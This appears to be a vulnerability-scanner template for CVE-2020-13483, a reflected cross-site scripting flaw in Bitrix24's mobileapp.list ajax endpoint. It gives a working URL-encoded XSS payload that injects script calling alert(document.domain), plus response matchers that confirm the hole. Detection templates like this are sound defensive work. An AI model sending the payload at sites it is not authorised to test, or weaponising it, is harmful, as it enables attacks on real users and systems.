id: CVE-2020-13483 info: name: Bitrix24 through 20.0.0 allows XSS author: pikpikcu severity: medium reference: https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558 description: The Web Application Firewall in Bitrix24 through 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI. tags: cve,cve2020,xss,bitrix classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2020-13483 cwe-id: CWE-79 requests: - method: GET path: - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E' matchers-condition: and matchers: - type: word words: - "function(handler){};function __MobileAppList(test){alert(document.domain);};//" part: body - type: word words: - text/html part: header - type: status status: - 200